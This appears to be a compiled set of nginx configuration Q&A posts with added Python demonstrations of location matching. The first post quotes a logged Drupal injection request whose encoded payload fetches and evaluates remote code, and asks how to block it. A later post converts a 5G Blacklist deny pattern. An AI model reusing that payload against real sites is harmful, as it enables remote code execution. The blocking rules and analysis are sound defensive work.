This is a common virus that hits with a POST URI like:
/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/
How to prevent it from going through nginx?
I tried
location ~* base64 {
    return 404;
}
to put down any request with base64 in it but it doesn't work. Please help and give me the right nginx regex rule. (I can't modify the app codebase or update the system).
if ($query_string ~ "base64") {
    return 404;
}
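Why the location attempt never fires while the $query_string test does, as an added example that is not part of the original posts: nginx tests location regexes against the path only, and here the payload sits in the query string. Python's re stands in for nginx's PCRE; the sample targets and the render_array_keys check are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request targets; the first mirrors the request quoted above,
# with the base64 payload replaced by a placeholder.
SAMPLES = [
    "/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map"
    "&name%5B%23suffix%5D=eval%28base64_decode%28%22PLACEHOLDER%22%29%29"
    "&name%5B%23markup%5D=assert&name%5B%23type%5D=markup",
    "/?q=node/12&page=2",
    "/files/base64-howto.txt",
]

def location_regex_hits(target, pattern=r"base64"):
    """`location ~* base64`: tested against the decoded path, never the args."""
    path = unquote(urlsplit(target).path)
    return re.search(pattern, path, re.IGNORECASE) is not None

def query_string_hits(target, pattern=r"base64"):
    """`if ($query_string ~ "base64")`: tested against the raw, encoded args."""
    return re.search(pattern, urlsplit(target).query) is not None

# Hypothetical stricter check: parameter names carrying a "[#key]" component,
# matched after decoding so the result does not depend on percent-encoding.
RENDER_KEY = re.compile(r"\[#\w+\]")

def render_array_keys(target):
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return sorted(name for name, _ in pairs if RENDER_KEY.search(name))

def report(targets=SAMPLES):
    """One row per target: (location hit, $query_string hit, flagged names)."""
    return [(location_regex_hits(t), query_string_hits(t), render_array_keys(t))
            for t in targets]

if __name__ == "__main__":
    for target, row in zip(SAMPLES, report()):
        print(row, target[:40])
```

The third sample shows the side effect of the location rule: it rejects an ordinary file whose path happens to contain the word, while the request it was written for passes.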
Related
I am trying to exclude some paths in my nginx proxypass and want everything else to go to my proxypass.
i.e. I don't want to give proxy_pass to any URL which starts with 'tiny' or 'static', but want everything else to go to my proxypass location.
And I am using the following regex to achieve this:
~ ^((?!tiny|static).)*$
But I always get a 404 error.
If I navigate to the following URL in the browser
localhost:8080/xyz
I want it to go to
localhost:8000/api/tiny/records/xyz
Can someone please help me by pointing out what the issue is?
Here is my full nginx conf file:
server {
    listen 8080;
    server_name localhost;
    location ~ ^((?!tiny|static).)*$ {
        proxy_pass http://localhost:8000/api/tiny/records/$1;
    }
    location / {
        proxy_pass http://localhost:8000;
    }
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root html;
    }
}
Thanks a lot.
You are missing a / and have the * in the wrong place. The regular expression should be:
^(/(?!tiny|static).*)$
But you do not need to use a regular expression with a negative lookahead assertion. Instead, place a normal regular expression on the other location block.
For example:
location / {
    proxy_pass http://localhost:8000/api/tiny/records/;
}
location ~ ^/(tiny|static) {
    proxy_pass http://localhost:8000;
}
I am trying to match specific parts of $uri using proxy_cache_key in nginx 1.12 for these requests where different file names (with no arguments) actually have the same file contents. :(
2018-04-02T21:25:37+00:00 MISS /bein1/1/media_w1751476191_2333.ts
2018-04-02T21:25:37+00:00 MISS /bein1/1/media_w2137194067_2333.ts
2018-04-02T21:25:38+00:00 MISS /bein1/1/media_w1023873154_2333.ts
I have tried the following:
location ~ ^/bein1/(.*)/media_(.*)_(.*).(ts)$ {
    proxy_cache_valid 200 302 60s;
    proxy_cache_key "/bein1/$1/media_$3.ts";
    proxy_pass http://origin;
    add_header "X-Hls-Cache-Status" "Cached TS";
}
But I still could not match the specified URI.
Can anyone help me, please?
Try with something like this:
location ~ ^/bein1/([-_a-zA-Z0-9/]+)/media_([-_a-zA-Z0-9/]+)_([0-9]+)\.ts$ {
    proxy_cache_key "/bein1/$1/media_$3.ts";
    proxy_cache_valid 200 302 60s;
    proxy_pass http://origin;
}
I have the following locations in my nginx config:
server {
    listen 80;
    server_name localhost;
    location ~ ^/(?!api)(.*)/api {
        alias /var/www/api/$1;
    }
    location /api {
        alias /var/www/api/latest;
    }
}
I am trying to match /api as the latest version, and /<version>/api as anything else. The non regex location is working fine, but I am getting a 403 on the other location.
I don't think it is anything to do with the file and permissions that are being served, as I get a 403 if I try to access
/latest/api
even though these are the same files that are served by
/api
Does anyone have any ideas about why I am getting a 403?
The nginx error is:
directory index of "/var/www/api/latest" is forbidden, client:
172.17.0.1, server: localhost, request: "HEAD /latest/api/ HTTP/1.1",
host: "localhost"
The problem is not with the regular expression, but with the use of the alias directive within a regular expression location. See this document for more.
On a related note, rather than using a negative lookahead assertion, you should use the ^~ modifier on the prefix location. See this document for more.
For example:
location ~ ^(/[^/]+)/api(.*)$ {
    alias /var/www/api$1$2;
}
location ^~ /api {
    alias /var/www/api/latest;
}
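A simplified model of how nginx chooses a location, run against the location lists from the proxy_pass exclusion question and answer and from the alias answer above. This is an added example, not code from the original posts; Python's re stands in for PCRE, nested and named locations are ignored, and NO_CARET_ALIAS is a constructed variant for comparison.

```python
import re

def select_location(uri, locations):
    """Pick a location the way nginx does (simplified: no nested locations).

    locations: (modifier, pattern) pairs in config order; modifier is "=",
    "^~", "" (plain prefix), "~" (regex) or "~*" (case-insensitive regex).
    Returns (modifier, pattern, captures), or None if nothing matches.
    """
    best = None
    for mod, pat in locations:
        if mod == "=" and uri == pat:
            return mod, pat, ()              # exact match ends the search
        if mod in ("", "^~") and uri.startswith(pat):
            if best is None or len(pat) > len(best[1]):
                best = (mod, pat, ())        # remember the longest prefix
    if best and best[0] == "^~":
        return best                          # ^~ suppresses the regex pass
    for mod, pat in locations:               # regexes: first match in order
        if mod in ("~", "~*"):
            m = re.search(pat, uri, re.IGNORECASE if mod == "~*" else 0)
            if m:
                return mod, pat, m.groups()
    return best                              # fall back to the longest prefix

# Location lists transcribed from the posts above (50x.html block omitted).
ASKED_PROXY = [("~", r"^((?!tiny|static).)*$"), ("", "/")]
ANSWER_PROXY = [("", "/"), ("~", r"^/(tiny|static)")]
ANSWER_ALIAS = [("~", r"^(/[^/]+)/api(.*)$"), ("^~", "/api")]
# Constructed variant: the same alias locations without the ^~ modifier.
NO_CARET_ALIAS = [("~", r"^(/[^/]+)/api(.*)$"), ("", "/api")]

if __name__ == "__main__":
    for name, conf, uri in [
        ("asked", ASKED_PROXY, "/xyz"),
        ("answer", ANSWER_PROXY, "/xyz"),
        ("answer", ANSWER_PROXY, "/static/app.js"),
        ("alias", ANSWER_ALIAS, "/latest/api/users"),
        ("alias", ANSWER_ALIAS, "/api/api/x"),
        ("no ^~", NO_CARET_ALIAS, "/api/api/x"),
    ]:
        print(name, uri, select_location(uri, conf))
```

For /xyz the asker's regex location is selected, but $1 holds only "z", because a repeated capture group keeps its last iteration. Without ^~, /api/api/x is taken by the regex location instead of the /api prefix.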
I'm trying to convert the 5G Blacklist from Apache (.htaccess) to Nginx (.conf). There is a line in .htaccess that is causing a problem:
<IfModule mod_alias.c>
    RedirectMatch 403 (\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")
</IfModule>
I have converted it to .conf as follows:
Code included in http block:
map $request_uri $bad_uri {
    default 0;
    "~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}
Code included in server block:
if ($bad_uri) {
    return 403;
}
As far as I know, both Apache and Nginx use Perl regex, so no change should be required when converting from the former to the latter. However, the following URIs are giving 403 on Nginx but working fine on Apache:
www.example.com/some,url,with,commas
www.example.com/?q=some,url,with,commas
Finally found the issue.
In Apache RedirectMatch matches only the url without query string whereas $request_uri in nginx maps to url with query string.
So the correct code for Nginx is:
map $uri $bad_uri {
    default 0;
    "~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}
I have this URI /orls/myservice/f?p=4550 and the following location:
location ~ "^/(.+)/myservice/f?p=(.+)$" {
    .....
}
Nginx is returning a 404 not found. The problem might come from the ? so I tried \? but I'm still getting the same error. Can anyone help?